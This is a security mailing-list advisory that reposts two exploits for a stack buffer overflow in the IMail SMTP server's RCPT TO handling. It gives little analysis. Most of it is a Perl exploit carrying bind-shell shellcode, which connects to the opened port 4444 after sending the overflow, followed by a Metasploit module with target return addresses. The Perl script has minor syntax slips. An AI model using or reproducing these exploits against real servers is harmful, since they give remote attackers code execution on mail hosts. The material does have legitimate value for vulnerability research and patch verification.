[EXPL] Imail Buffer Overflow Exploit (RCPT TO)

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Imail Buffer Overflow Exploit (RCPT TO)
------------------------------------------------------------------------


SUMMARY

" <http://www.ipswitch.com/products/imail/index.asp> IMail Server is an 
easy to use mail server that protects you from spam and viruses". " 
<http://www.ipswitch.com/products/collaboration/index.asp> Ipswitch 
Collaboration Suite includes an email server, secure instant messaging, 
anti-virus, anti-spam, shared calendering and other email and 
collaboration features." A vulnerability in the way Imail handles incoming 
RCPT TO requests allows remote attackers to overflow an internal buffer 
used by the program, which in turn can be used to cause the program to 
execute arbitrary code.

DETAILS

Vulnerable Systems:
 * Imail SMTP Server versions 8.10-8.12

Exploit (perl):
#!/usr/bin/perl
# http://www.zerodayinitiative.com/advisories/ZDI-06-028.html
#
# acaro [at] jervus.it

use IO::Socket::INET;
use Switch;

if (@ARGV < 3) {
print 
"--------------------------------------------------------------------\n";
print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress 
-oTargetReturnAddress\n";
print " Return address: \n";
print " o1 - IMail 8.12 Version\n";
print " o2 - IMail 8.10 Versio\n";
print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl 
-h127.0.0.1 -o1 \n";
print 
"--------------------------------------------------------------------\n";
}

use IO::Socket::INET;

my $host = 10.0.0.2;
my $port = 25;
my $reply;
my $request;
my $happystack="\x81\xc4\xff\xef\xff\xff\x44";

foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$eip = $1 if ($_=~/-o(.*)/);
}

switch ($eip) {
case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 
8.12
case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 
8.10
}

# win32_bind -  EXITFUNC=seh LPORT=4444

my $shellcode  = 
"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93".
"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9".
"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd".
"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf".
"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e".
"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd".
"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd".
"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66".
"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6".
"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34".
"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65".
"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7".
"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e".
"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f".
"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61".
"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66".
"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b".
"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9".
"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67".
"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6".
"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69".
"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";

my $nop="\x41"x137;

my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" 
$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, 
PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = "EHLO " . "\r\n";
send $socket, $request, 0;
print "[+] Sent  EHLO\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . 
"\x3e" . "\r\n";
send $socket, $request, 0;
print "[+] Sent  MAIL FROM\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

$request = $buffer;
send $socket, $request, 0;
print "[+] Sent malicius request\n";
close $socket;

print " + connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;

Exploit (metasploit):
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::imail_smtp_rcpt_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };

my $info = {
        'Name'    => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit',
        'Version'  => '$Revision: 1.0 $',
        'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ],
        'Arch'    => [ 'x86' ],
        'OS'      => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
        'Priv'    => 1,

        'UserOpts'  =>
          {
                'RHOST' => [1, 'ADDR', 'The target address'],
                'RPORT' => [1, 'PORT', 'The target port', 25],
                'Encoder'   => [1, 'EncodedPayload', 'Use Pex!!'],

                
          },

        'AutoOpts'  => { 'EXITFUNC'  => 'seh' },
        'Payload' =>
          {
                'Space'     => 400,
                'BadChars'  => "\x00\x0d\x0a\x20\x3e\x22\x40",
                'Keys'      => ['+ws2ord'],
                

          },

        'Description'  => Pex::Text::Freeform(qq{
This module exploits a stack based buffer overflow in IMail 2006 and 8.x 
SMTP service.
If we send a long strings for RCPT TO command contained within the 
characters '@' and ':'
we can overwrite the eip register and exploit the vulnerable smpt service
}),

        'Refs'  =>
          [
                ['BID', '19885'],
                ['CVE', '2006-4379'],
                ['URL',   
'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'],
          ],

        'Targets' =>
          [

        ['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in 
SmtpDLL.dll for IMail 8.10
        ['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in 
SmtpDLL.dll for IMail 8.12


          ],

        'DefaultTarget' => 0,

        'Keys' => ['smtp'],

        'DisclosureDate' => 'September 7 2006',
  };

sub new {
        my $class = shift;
        my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => 
$advanced}, @_);

        return($self);
}

sub Exploit {
        my $self = shift;
        my $target_host = $self->GetVar('RHOST');
        my $target_port = $self->GetVar('RPORT');
        my $target_idx  = $self->GetVar('TARGET');
        my $shellcode   = $self->GetVar('EncodedPayload')->Payload;

        my $target = $self->Targets->[$target_idx];



        my $ehlo = "EHLO " . "\r\n";

        my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro". 
"\x40"."jervus.it" . "\x3e" . "\r\n";


        my $pattern = "\x20\x3c\x40";
        $pattern .= pack('V', $target->[1]);
        $pattern .="\x3a" . $self->MakeNops((0x1e8-length ($shellcode)));
        $pattern .= $shellcode;
        $pattern .= "\x4a\x61\x63\x3e";

        my $request = "RCPT TO: " . $pattern ."\n";

        $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using pop 
eax, ret at 0x%.8x...", $target->[1]));

        my $s = Msf::Socket::Tcp->new
          (
                'PeerAddr'  => $target_host,
                'PeerPort'  => $target_port,
                'LocalPort' => $self->GetVar('CPORT'),
                'SSL'       => $self->GetVar('SSL'),
          );

        if ($s->IsError) {
                $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError);
                return;
        }
my $r = $s->Recv(-1, 5);

        $s->Send($ehlo);
        $self->PrintLine("[*] I'm sending ehlo command");
        $self->PrintLine("[*] $r");
        sleep(2);
                
        $s->Send($mail_from);
        $self->PrintLine("[*] I'm sending mail from command");
        $r = $s->Recv(-1, 10);
        $self->PrintLine("[*] $r");
        sleep(2);

        $s->Send($request);
        $self->PrintLine("[*] I'm sending rcpt to command");
        sleep(2);

        return;
}


ADDITIONAL INFORMATION

The original articles could be found at:
 <http://www.milw0rm.com/exploits/3264> 
http://www.milw0rm.com/exploits/3264
 <http://www.milw0rm.com/exploits/3265> 
http://www.milw0rm.com/exploits/3265



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.